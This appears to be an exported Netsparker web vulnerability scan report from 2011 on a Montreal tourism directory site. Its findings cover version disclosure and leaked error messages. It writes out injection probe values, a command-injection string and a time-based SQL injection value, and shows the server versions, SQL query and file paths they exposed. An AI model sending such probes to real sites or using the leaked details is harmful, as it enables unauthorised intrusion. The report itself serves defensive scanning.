</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="montreal-tour/index.php">Montreal Attractions</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="movie-listings/index.php">Montreal Movies</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="weather.php">Montreal Weather </a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="history.php">History of Montreal </a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="costliving.php">Montreal Cost of Living</a></td> </tr> </table><!-- #EndLibraryItem --></td> </tr> <tr> <td colspan="2" align="right" valign="top" bgcolor="#FFFFFF"&g..
Apache Module Version Disclosure

Apache Module Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /

/

http://www.montrealkiosk.com/

Extracted Version

mod_ssl/2.8.31 OpenSSL/0.9.7a

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:20:06 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Montreal, Quebec - Restaurants, Events, Hotels, Attractions -- Montreal Kiosk</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><script type="text/javascript" src="http://www.canoe.com/generix/js/generix.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/js/GenFonction.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/TagDfpSection.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/quebec/TagDfpConfig.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/TagDfpEngine.js"></script><link rel="shortcut icon" href="favicon.ico"><meta name="description" content="Montreal's One Stop Information Kiosk. Links to all major hotels and businesses in Montreal, Quebec, Canada. If you are planning to travel to Montreal this is the guide for you."><script type="text/javascript" src="show.js"></script><link href="main.css" rel="stylesheet" type="text/css"><link href="weather/css/weather2.css" rel="stylesheet" type="text/css" /></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('img/bhome-on.gif','img/bsitemap-on.gif','img/bcontact-on.gif','img/bbookmark-on.gif','img/binfo-on.gif','img/btour-on.gif','img/bevents-on.gif','img/bhotel-on.gif','img/babout-on.gif');runSlideShow()"><iframe height="25" width="100%" src="/canoe.php" scrolling="no" marginwidth="0" framespacing="0" marginheight="0" frameborder="0" allowtransparency="true"></iframe><table width="747" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="730" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:4"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--></script><noscript><a href='http://www.uberip.com/adserver/adclick.php?n=aae0fd6b' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:4&amp;n=aae0fd6b' border='0' alt=''></a></noscript></td> <td width="17"><a href="advertising-rate-card.php"><img src="img/banners/advertising.gif" alt="Montreal Advertising" width="17" height="92" border="0"></a></td> </tr> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="3"></td> </tr></table><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="top"> <td height="298" background="img/bg-menu.jpg" width="1600">&nbsp;</td> <td colspan="5" background="img/bg-menu.jpg"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="4"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td width="551"><a href="/index.php"><img src="img/montreal.gif" alt="Montreal Kiosk - Your Guide to Montreal, Quebec. Book Montreal Hotel accommodations here... read up on our Montreal Tour Guide and Montreal events." width="551" height="90" border="0"></a></td> <td><a href="index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image2','','img/bhome-on.gif',1)"><img src="img/bhome.gif" alt="Montreal, Quebec" name="Image2" width="41" height="30" border="0"></a><a href="sitemap.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image3','','img/bsitemap-on.gif',1)"><img src="img/bsitemap.gif" alt="Site Map" name="Image3" width="55" height="30" border="0"></a><a href="contact.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image4','','img/bcontact-on.gif',1)"><img src="img/bcontact.gif" alt="Montreal Kiosk Contact Info" name="Image4" width="74" height="30" border="0"></a><a href="javascript:addBookmark('Montreal Kiosk - Your Guide to Montreal, Quebec','http://www.montrealkiosk.com')" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image5','','img/bbookmark-on.gif',1)"><img src="img/bbookmark.gif" alt="Bookmark Montreal Kiosk" name="Image5" width="96" height="30" border="0"></a></td> </tr> </table></td> </tr> <tr> <td width="120"><img src="img/menupic1.jpg" width="120" height="208"></td> <td width="204" valign="top"><table width="204" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="204" height="29"><a href="#directory" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image7','','img/binfo-on.gif',1)"><img src="img/binfo.gif" alt="Montreal Business Directory" name="Image7" width="204" height="30" border="0"></a><a href="montreal-tour/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image10','','img/btour-on.gif',1)"><img src="img/btour.gif" alt="Montreal Tour Guide" name="Image10" width="204" height="29" border="0"></a><a href="montreal-events/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image11','','img/bevents-on.gif',1)"><img src="img/bevents.gif" alt="Montreal Events" name="Image11" width="204" height="29" border="0"></a><a href="quebec-hotels/montreal_quebec_canada_hotels.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','img/bhotel-on.gif',1)"><img src="img/bhotel.gif" alt="Montreal Hotels" name="Image12" width="204" height="29" border="0"></a><a href="about.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','img/babout-on.gif',1)"><img src="img/babout.gif" alt="About Montreal Kiosk" name="Image13" width="204" height="29" border="0"></a></td> </tr> <tr> <form name="form1" method="post" action=""> <td height="52"> <table width="204" height="52" border="0" cellpadding="0" cellspacing="0" background="img/buttonfiller.gif"> <tr> <td width="31">&nbsp;</td> <td width="173" height="29"><!-- #BeginLibraryItem "/Library/quicklinks.lbi" --><select name="montreal" class="smalltext" OnChange="location.href=form1.montreal.options[selectedIndex].value"> <option selected>Quick Links <option value="http://www.montrealkiosk.com/montreal-tour/index.php">Montreal Attractions <option value="http://www.montrealkiosk.com/maps/index.php">Map of Montreal <option value="http://www.montrealkiosk.com/weather.php">Montreal Weather <option value="http://www.montrealkiosk.com/quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels <option value="http://www.montrealkiosk.com/advertising.php">Advertising Information <option value="http://www.montrealkiosk.com/contact.php">Contact Us</select><!-- #EndLibraryItem --></td> </tr> <tr> <td height="33" colspan="2" background="img/bg-button.gif">&nbsp;</td> </tr> </table></td> </form> </tr> </table></td> <td width="493"><img src="img/menupic2.jpg" alt="Montreal, Quebec - A Place to Awaken Your Senses" name="SlideShow" width="493" height="208" id="SlideShow"></td> <td><img src="img/menupic3.jpg" width="183" height="208"></td> </tr> </table></td> <td background="img/bg-menu.jpg" width="1600">&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td colspan="2" valign="top" class="bgmenu"> <table width="314" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="127" valign="top"><table width="127" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="34" height="5"></td> </tr> <tr> <td width="16">&nbsp;</td> <td><table width="96" border="0" cellpadding="0" cellspacing="0"> <tr> <td> <table width="96" height="234" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="22" valign="top"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/weather.gif" alt="Montreal Weather" title="Montreal Weather" width="22" height="206" border="0"></a></td><td width="74" height="206" valign="top" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-bg.gif"> <table width="74" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/thu.gif" alt="Thursday" title="Thursday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/03.gif" alt="Cloudy with sunny periods" title="Cloudy with sunny periods" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-7&deg;C</td> </tr> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/fri.gif" alt="Friday" title="Friday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/02.gif" alt="A mix of sun and cloud" title="A mix of sun and cloud" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-8&deg;C</td> </tr> </table> </td> </tr> <tr> <td colspan="2" style="font-family: Arial,Helvetica,sans-serif; font-size: 10px; color: #333333;" align="center" valign="middle" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-datebg.gif">Thu, Jan 13th</td> </tr> </table> <br><br><br> </td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td><a href="http://www.montrealatnight.ca" target="_blank"><img src="img/banners/atnight.gif" alt="Montreal Nightlife Guide and Adult Directory" width="96" height="47" border="0"></a></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td></td> </tr> </table></td> </tr> </table></td> <td width="187" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="img/titlearrow.gif" width="22" height="22"></td> <td><img src="img/spc.gif" width="4" height="10"></td> <td><NOBR class="maintitle">Montreal Info</NOBR></td> <td><img src="img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="img/spc.gif" width="100" height="3"></td> </tr> </table> <!-- #BeginLibraryItem "/Library/tourism-menu.lbi" --><table width="100%" border="0" cellspacing="3" cellpadding="3"> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="montreal-tourism.php">Montreal Tourism</a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="maps/index.php">Montreal Map </a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="montreal-tour/index.php">Montreal Attractions</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="movie-listings/index.php">Montreal Movies</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="weather.php">Montreal Weather </a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="history.php">History of Montreal </a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="costliving.php">Montreal Cost of Living</a></td> </tr> </table><!-- #EndLibraryItem --></td> </tr> <tr> <td colspan="2" align="right" valign="top" bgcolor="#FFFFFF"&g..
Frontpage Version Disclosure

Frontpage Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the FrontPage version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.

Remedy

Configure your web server to prevent information leakage from headers of its HTTP response.
- /

/

http://www.montrealkiosk.com/

Extracted Version

FrontPage/5.0.2.2635

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:20:06 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Montreal, Quebec - Restaurants, Events, Hotels, Attractions -- Montreal Kiosk</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><script type="text/javascript" src="http://www.canoe.com/generix/js/generix.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/js/GenFonction.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/TagDfpSection.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/external/www.canadiantourismnetwork.com/quebec/TagDfpConfig.js"></script><script type="text/javascript" src="http://www.canoe.com/generix/dfp/TagDfpEngine.js"></script><link rel="shortcut icon" href="favicon.ico"><meta name="description" content="Montreal's One Stop Information Kiosk. Links to all major hotels and businesses in Montreal, Quebec, Canada. If you are planning to travel to Montreal this is the guide for you."><script type="text/javascript" src="show.js"></script><link href="main.css" rel="stylesheet" type="text/css"><link href="weather/css/weather2.css" rel="stylesheet" type="text/css" /></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('img/bhome-on.gif','img/bsitemap-on.gif','img/bcontact-on.gif','img/bbookmark-on.gif','img/binfo-on.gif','img/btour-on.gif','img/bevents-on.gif','img/bhotel-on.gif','img/babout-on.gif');runSlideShow()"><iframe height="25" width="100%" src="/canoe.php" scrolling="no" marginwidth="0" framespacing="0" marginheight="0" frameborder="0" allowtransparency="true"></iframe><table width="747" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="2"></td> </tr> <tr bgcolor="#333333"> <td width="730" height="92" align="center" valign="middle"><script language='JavaScript' type='text/javascript' src='http://www.uberip.com/adserver/adx.js'></script><script language='JavaScript' type='text/javascript'><!-- if (!document.phpAds_used) document.phpAds_used = ','; phpAds_random = new String (Math.random()); phpAds_random = phpAds_random.substring(2,11); document.write ("<" + "script language='JavaScript' type='text/javascript' src='"); document.write ("http://www.uberip.com/adserver/adjs.php?n=" + phpAds_random); document.write ("&amp;what=zone:4"); document.write ("&amp;exclude=" + document.phpAds_used); if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer)); document.write ("'><" + "/script>");//--></script><noscript><a href='http://www.uberip.com/adserver/adclick.php?n=aae0fd6b' target='_blank'><img src='http://www.uberip.com/adserver/adview.php?what=zone:4&amp;n=aae0fd6b' border='0' alt=''></a></noscript></td> <td width="17"><a href="advertising-rate-card.php"><img src="img/banners/advertising.gif" alt="Montreal Advertising" width="17" height="92" border="0"></a></td> </tr> <tr> <td colspan="2"><img src="img/spc.gif" width="200" height="3"></td> </tr></table><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="top"> <td height="298" background="img/bg-menu.jpg" width="1600">&nbsp;</td> <td colspan="5" background="img/bg-menu.jpg"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="4"><table width="1000" border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td width="551"><a href="/index.php"><img src="img/montreal.gif" alt="Montreal Kiosk - Your Guide to Montreal, Quebec. Book Montreal Hotel accommodations here... read up on our Montreal Tour Guide and Montreal events." width="551" height="90" border="0"></a></td> <td><a href="index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image2','','img/bhome-on.gif',1)"><img src="img/bhome.gif" alt="Montreal, Quebec" name="Image2" width="41" height="30" border="0"></a><a href="sitemap.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image3','','img/bsitemap-on.gif',1)"><img src="img/bsitemap.gif" alt="Site Map" name="Image3" width="55" height="30" border="0"></a><a href="contact.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image4','','img/bcontact-on.gif',1)"><img src="img/bcontact.gif" alt="Montreal Kiosk Contact Info" name="Image4" width="74" height="30" border="0"></a><a href="javascript:addBookmark('Montreal Kiosk - Your Guide to Montreal, Quebec','http://www.montrealkiosk.com')" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image5','','img/bbookmark-on.gif',1)"><img src="img/bbookmark.gif" alt="Bookmark Montreal Kiosk" name="Image5" width="96" height="30" border="0"></a></td> </tr> </table></td> </tr> <tr> <td width="120"><img src="img/menupic1.jpg" width="120" height="208"></td> <td width="204" valign="top"><table width="204" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="204" height="29"><a href="#directory" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image7','','img/binfo-on.gif',1)"><img src="img/binfo.gif" alt="Montreal Business Directory" name="Image7" width="204" height="30" border="0"></a><a href="montreal-tour/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image10','','img/btour-on.gif',1)"><img src="img/btour.gif" alt="Montreal Tour Guide" name="Image10" width="204" height="29" border="0"></a><a href="montreal-events/index.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image11','','img/bevents-on.gif',1)"><img src="img/bevents.gif" alt="Montreal Events" name="Image11" width="204" height="29" border="0"></a><a href="quebec-hotels/montreal_quebec_canada_hotels.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','img/bhotel-on.gif',1)"><img src="img/bhotel.gif" alt="Montreal Hotels" name="Image12" width="204" height="29" border="0"></a><a href="about.php" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','img/babout-on.gif',1)"><img src="img/babout.gif" alt="About Montreal Kiosk" name="Image13" width="204" height="29" border="0"></a></td> </tr> <tr> <form name="form1" method="post" action=""> <td height="52"> <table width="204" height="52" border="0" cellpadding="0" cellspacing="0" background="img/buttonfiller.gif"> <tr> <td width="31">&nbsp;</td> <td width="173" height="29"><!-- #BeginLibraryItem "/Library/quicklinks.lbi" --><select name="montreal" class="smalltext" OnChange="location.href=form1.montreal.options[selectedIndex].value"> <option selected>Quick Links <option value="http://www.montrealkiosk.com/montreal-tour/index.php">Montreal Attractions <option value="http://www.montrealkiosk.com/maps/index.php">Map of Montreal <option value="http://www.montrealkiosk.com/weather.php">Montreal Weather <option value="http://www.montrealkiosk.com/quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels <option value="http://www.montrealkiosk.com/advertising.php">Advertising Information <option value="http://www.montrealkiosk.com/contact.php">Contact Us</select><!-- #EndLibraryItem --></td> </tr> <tr> <td height="33" colspan="2" background="img/bg-button.gif">&nbsp;</td> </tr> </table></td> </form> </tr> </table></td> <td width="493"><img src="img/menupic2.jpg" alt="Montreal, Quebec - A Place to Awaken Your Senses" name="SlideShow" width="493" height="208" id="SlideShow"></td> <td><img src="img/menupic3.jpg" width="183" height="208"></td> </tr> </table></td> <td background="img/bg-menu.jpg" width="1600">&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td colspan="2" valign="top" class="bgmenu"> <table width="314" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="127" valign="top"><table width="127" border="0" cellspacing="0" cellpadding="0"> <tr> <td colspan="2"><img src="img/spc.gif" width="34" height="5"></td> </tr> <tr> <td width="16">&nbsp;</td> <td><table width="96" border="0" cellpadding="0" cellspacing="0"> <tr> <td> <table width="96" height="234" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="22" valign="top"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/weather.gif" alt="Montreal Weather" title="Montreal Weather" width="22" height="206" border="0"></a></td><td width="74" height="206" valign="top" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-bg.gif"> <table width="74" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/thu.gif" alt="Thursday" title="Thursday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/03.gif" alt="Cloudy with sunny periods" title="Cloudy with sunny periods" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-7&deg;C</td> </tr> <tr> <td align="center"><img src="http://www.todaysweather.ca/widget_icons/weather/img2/fri.gif" alt="Friday" title="Friday"></td> </tr> <tr> <td height="60" align="center"><a href="http://www.montrealkiosk.com/weather.php"><img src="http://www.todaysweather.ca/widget_icons//weather/02.gif" alt="A mix of sun and cloud" title="A mix of sun and cloud" border="0"></a></td> </tr> <tr> <td height="19" align="center" style="font-size: 10px; font-weight: bold; color: #ffffff; font-family: Arial,Helvetica,sans-serif;">-8&deg;C</td> </tr> </table> </td> </tr> <tr> <td colspan="2" style="font-family: Arial,Helvetica,sans-serif; font-size: 10px; color: #333333;" align="center" valign="middle" background="http://www.todaysweather.ca/widget_icons/weather/img2/weather-datebg.gif">Thu, Jan 13th</td> </tr> </table> <br><br><br> </td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td><a href="http://www.montrealatnight.ca" target="_blank"><img src="img/banners/atnight.gif" alt="Montreal Nightlife Guide and Adult Directory" width="96" height="47" border="0"></a></td> </tr> <tr> <td>&nbsp;</td> </tr> <tr> <td></td> </tr> </table></td> </tr> </table></td> <td width="187" valign="top" bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><img src="img/titlearrow.gif" width="22" height="22"></td> <td><img src="img/spc.gif" width="4" height="10"></td> <td><NOBR class="maintitle">Montreal Info</NOBR></td> <td><img src="img/spc.gif" width="8" height="10"></td> <td width="1600" bgcolor="#CCCCCC">&nbsp;</td> </tr> <tr> <td colspan="5"><img src="img/spc.gif" width="100" height="3"></td> </tr> </table> <!-- #BeginLibraryItem "/Library/tourism-menu.lbi" --><table width="100%" border="0" cellspacing="3" cellpadding="3"> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="montreal-tourism.php">Montreal Tourism</a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="maps/index.php">Montreal Map </a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="montreal-tour/index.php">Montreal Attractions</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="quebec-hotels/montreal_quebec_canada_hotels.php">Montreal Hotels</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="movie-listings/index.php">Montreal Movies</a> </td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="weather.php">Montreal Weather </a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="history.php">History of Montreal </a></td> </tr> <tr> <td><img src="img/arrow.gif" width="10" height="10" hspace="3"><a href="costliving.php">Montreal Cost of Living</a></td> </tr> </table><!-- #EndLibraryItem --></td> </tr> <tr> <td colspan="2" align="right" valign="top" bgcolor="#FFFFFF"&g..
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
- /directory.php

/directory.php

http://www.montrealkiosk.com/directory.php?categoryId=%22%26%20SET%20%2FA%200xFFF9999-2%20%26

Parameters

Parameter Type Value
categoryId GET "& SET /A 0xFFF9999-2 &

Request

GET /directory.php?categoryId=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:21:07 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


mysql error: [1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"& SET /A 0xFFF9999-2 & ORDER BY name' at line 1] in EXECUTE("SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing_to_premium_category.category_id = \"& SET /A 0xFFF9999-2 & ORDER BY name")<pre align=left><font face="Courier New,Courier">ADOConnection.Execute(SELECT * FROM listing, listing_to_premium_category WHERE listing.listing_id = listing_to_premium_category.listing_id AND listing...)</font><font color=#808080 size=-1> % line 822, file: <a href="file://home/montreak/public_html/logic/CatalogDAO.class.php">CatalogDAO.class.php</a></font><font face="Courier New,Courier">CatalogDAO.getPremiumListings(\&quot;&amp; SET /A 0xFFF9999-2 &amp;, Object:PagingHelper)</font><font color=#808080 size=-1> % line 217, file: <a href="file://home/montreak/public_html/directory.php">directory.php</a></font></pre>
Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.
- /directory.php

/directory.php

http://www.montrealkiosk.com/directory.php?name=Arts%20&%20Entertainment='%3BSELECT%20pg_sleep(25)--..

Parameters

Parameter Type Value
name GET Arts
%20Entertainment GET ';SELECT pg_sleep(25)--
categoryId GET 166

Identified Error Message

<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: Too many connections in <b>/home/montreak/public_html/adodb/drivers/adodb-mysql.inc.php</b> on line <b>355</b>

Request

GET /directory.php?name=Arts%20&%20Entertainment='%3BSELECT%20pg_sleep(25)--&categoryId=166 HTTP/1.1
Referer: http://www.montrealkiosk.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.montrealkiosk.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 13 Jan 2011 19:22:09 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Powered-By: PHP/5.2.9
Transfer-Encoding: chunked
Content-Type: text/html


